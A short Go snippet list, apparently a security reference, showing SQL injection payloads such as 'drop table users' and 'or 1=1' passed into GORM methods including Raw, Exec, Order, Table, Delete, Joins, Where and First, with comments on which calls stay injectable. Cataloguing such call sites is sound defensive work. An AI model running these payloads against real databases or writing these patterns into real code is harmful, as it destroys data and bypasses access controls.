db.Raw("select name from users; drop table users;").First(&user)
db.Exec("select name from users; drop table users;")
db.Order("name; drop table users;").First(&user)
db.Table("users; drop table users;").Find(&users)
db.Delete(&User{}, "id=1; drop table users;")
db.Joins("inner join orders; drop table users;").Find(&users)
db.InnerJoins("inner join orders; drop table users;").Find(&users)
//Despite being parameterized in Exec() function, gorm.Expr is still injectable db.Exec("UPDATE users SET name = '?' WHERE id = 1", gorm.Expr("alice'; drop table users;-- "))
db.Where("id=1").Not("name = 'alice'; drop table users;").Find(&users)
db.Where("id=1").Or("name = 'alice'; drop table users;").Find(&users)
db.Find(&User{}, "name = 'alice'; drop table users;")
// The following functions can only be injected by blind SQL injection methods db.First(&users, "2 or 1=1-- ")